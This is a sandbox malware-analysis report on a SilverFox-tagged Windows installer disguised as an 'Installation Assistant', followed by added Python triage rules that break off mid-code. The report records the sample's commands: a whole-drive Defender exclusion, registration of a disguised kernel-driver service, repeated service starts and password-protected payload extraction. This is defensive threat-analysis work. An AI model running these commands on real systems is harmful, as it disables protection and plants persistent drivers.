
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.2.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b1.0.2.exe (the #Uxxxx sequences are the sandbox's escaping of non-ASCII characters in the file name; decoded, the name reads 安装助手1.0.2.exe, "Installation Assistant 1.0.2", and the same escaped form is used for this file throughout the process tree below)
(renamed because original name is a hash value)
Original sample name: 1.0.2.exe
Analysis ID: 1579802
MD5: 8d24ff51c87bc901cb4c88cb885dc15a
SHA1: c8f7e17799b8ad0769f83b2d7d8f491384aa93d0
SHA256: 52ae54a6103be491559249ed1ed982b69b06948849a880db142eb37ff0484a3b
Tags: exe, SilverFox, winos, user-kafan_shengui
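The escaped sample name can be turned back into the original file name offline. The following Python is an added example, not part of the Joe Sandbox report; it assumes, based only on the names shown in this report, that the sandbox writes every non-ASCII character as `#U` followed by its four-digit hexadecimal code point and leaves ASCII untouched (characters outside the Basic Multilingual Plane are not covered by that assumption).

```python
"""Decode and re-encode the #Uxxxx file-name escaping seen in this report (added example)."""
import re

# Assumption drawn from this report: each non-ASCII character appears as '#U' plus its
# 4-hex-digit code point; ASCII is left as-is. Code points above 0xFFFF are out of scope.
_ESC = re.compile(r"#U([0-9A-Fa-f]{4})")


def decode_joe_name(escaped: str) -> str:
    """'#U5b89#U88c5#U52a9#U624b1.0.2.exe' -> the original Unicode file name."""
    return _ESC.sub(lambda m: chr(int(m.group(1), 16)), escaped)


def encode_joe_name(name: str) -> str:
    """Inverse of decode_joe_name for BMP characters; refuses anything wider."""
    out = []
    for ch in name:
        cp = ord(ch)
        if cp < 0x80:
            out.append(ch)
        elif cp <= 0xFFFF:
            out.append(f"#U{cp:04x}")
        else:
            raise ValueError(f"U+{cp:X} has no 4-digit #U form under the assumed scheme")
    return "".join(out)


if __name__ == "__main__":
    print(decode_joe_name("#U5b89#U88c5#U52a9#U624b1.0.2.exe"))
```

Decoding the name before pivoting on it matters in practice: a hunt for the sample by file name in EDR or proxy logs has to use the real Unicode string, not the sandbox's escaped form.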

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 4060 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 8D24FF51C87BC901CB4C88CB885DC15A)
    • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 6220 cmdline: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 6336 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 3544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 3548 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: 8D24FF51C87BC901CB4C88CB885DC15A)
        • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 5560 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6496 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5232 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 800 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5892 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5552 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2328 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2656 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6644 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 420 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6880 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1352 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5696 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1812 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7024 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6412 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1352 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5144 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1616 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4864 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5692 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4256 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2404 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 936 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6500 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1864 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5692 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7024 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Five Sigma rules matched, all on two process-creation events: the Defender exclusion issued by powershell.exe (PID 6336, child of the first installer stub, PID 6220) and the kernel-service registration issued by sc.exe (PID 800). The rule names the report lists are Powershell Base64 Encoded MpPreference Cmdlet, Powershell Defender Exclusion and New Kernel Driver Via SC.EXE.
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6220, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6336, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 800, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6220, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6336, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 800, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6220, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6336, ProcessName: powershell.exe
No Suricata rule has matched
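The two events the Sigma rules fire on (the whole-drive Defender exclusion from PID 6336 and the kernel-service creation from PID 800), together with the two password-protected 7zr.exe extractions and the 32 `cmd /c start sc start CleverSoar` launches in the process tree, can be triaged with a handful of process-creation rules. The Python below is an added example, not part of the Joe Sandbox report and not the text of any Sigma rule: the events are constructed from the command lines shown in the tree with their reported PIDs, plus one event that is not in the report (PID 9001, the same cmdlet hidden behind `-EncodedCommand`) to show why decoding matters. The tokenizer is a simplification of Windows quoting rules, the retry threshold and the list of archive extensions are assumptions, and the rule names are mine.

```python
"""Triage rules over process-creation events; added example, not part of the Joe Sandbox report."""
import base64
import ntpath
import re
from collections import Counter, namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid cmdline")   # one process-creation event
Finding = namedtuple("Finding", "rule pid detail")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(cmdline):
    """Split on whitespace, keeping "quoted spans" whole (simplified Windows quoting)."""
    return [q or w for q, w in _TOKEN.findall(cmdline)]

def image_name(cmdline):
    """Lower-cased file name of the first token minus '.exe': sc, sc.exe or a full path -> 'sc'."""
    tokens = tokenize(cmdline)
    name = ntpath.basename(tokens[0]).lower() if tokens else ""
    return name[:-4] if name.endswith(".exe") else name

# Rule 1: Defender exclusion added through PowerShell. A -EncodedCommand payload (base64 of
# UTF-16LE) is decoded and appended first, so the cmdlet is matched whether or not it is hidden.
_ENC = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
_MP_EXCL = re.compile(r"(?:Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)"
                      r"\s+['\"]?([^'\"\s]+)", re.IGNORECASE | re.DOTALL)
_ROOT_DRIVE = re.compile(r"^[A-Za-z]:\\?$")

def expand_encoded(cmdline):
    m = _ENC.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not base64/UTF-16 after all: leave it alone
        return cmdline

def rule_defender_exclusion(ev):
    out = []
    for kind, target in _MP_EXCL.findall(expand_encoded(ev.cmdline)):
        scope = "whole drive" if _ROOT_DRIVE.match(target) else kind.lower()
        out.append(Finding("defender_exclusion", ev.pid, f"{scope}: {target}"))
    return out

# Rules 2 and 3: sc.exe registering a kernel service from an odd path, and a start retry loop.
def parse_sc(tokens):
    """'sc <verb> <service> key= value ...' -> (verb, service, {key: value}); sc puts a space after '='."""
    verb = tokens[1].lower() if len(tokens) > 1 else ""
    service = tokens[2] if len(tokens) > 2 else ""
    rest = tokens[3:]
    opts = {rest[i][:-1].lower(): rest[i + 1] for i in range(len(rest) - 1) if rest[i].endswith("=")}
    return verb, service, opts

def rule_kernel_driver(ev, tokens):
    verb, service, opts = parse_sc(tokens)
    if verb != "create" or opts.get("type", "").lower() != "kernel":
        return []
    path = opts.get("binpath", "")
    oddities = []
    if "\\system32\\drivers\\" not in path.lower():
        oddities.append("outside System32\\drivers")
    if not path.lower().endswith(".sys"):
        oddities.append("extension is not .sys")
    detail = f"service {service} -> {path}" + (f" ({'; '.join(oddities)})" if oddities else "")
    return [Finding("kernel_driver_service", ev.pid, detail)]

def rule_service_start_loop(events, threshold=3):
    starts, first_pid = Counter(), {}
    for ev in events:
        if image_name(ev.cmdline) == "sc":
            verb, service, _ = parse_sc(tokenize(ev.cmdline))
            if verb == "start" and service:
                starts[service] += 1
                first_pid.setdefault(service, ev.pid)
    return [Finding("service_start_loop", first_pid[s], f"sc start {s} issued {n} times")
            for s, n in starts.items() if n >= threshold]

# Rule 4: 7-Zip console extracting a password-protected payload (here from .dat files).
_ARCHIVE_EXT = (".7z", ".zip", ".rar", ".tar", ".gz", ".xz", ".cab")

def rule_password_archive(ev, tokens):
    if image_name(ev.cmdline) not in ("7z", "7za", "7zr") or len(tokens) < 3 or tokens[1] not in ("x", "e"):
        return []
    password = next((t[2:] for t in tokens[2:] if t.startswith("-p")), None)
    if password is None:
        return []
    archive = next((t for t in tokens[2:] if not t.startswith("-")), "")
    note = "" if archive.lower().endswith(_ARCHIVE_EXT) else " (non-archive extension)"
    return [Finding("password_archive_extract", ev.pid, f"{archive} password={password}{note}")]

def triage(events):
    findings = []
    for ev in events:
        tokens, name = tokenize(ev.cmdline), image_name(ev.cmdline)
        if name in ("powershell", "pwsh"):
            findings += rule_defender_exclusion(ev)
        if name == "sc":
            findings += rule_kernel_driver(ev, tokens)
        findings += rule_password_archive(ev, tokens)
    return findings + rule_service_start_loop(events)

# Constructed input: command lines copied from the process tree above with their PIDs, plus one
# event that is NOT in the report (PID 9001): the same cmdlet hidden behind -EncodedCommand.
_ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16-le")).decode()
EVENTS = [
    ProcEvent(6336, 6220, r'''"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"'''),
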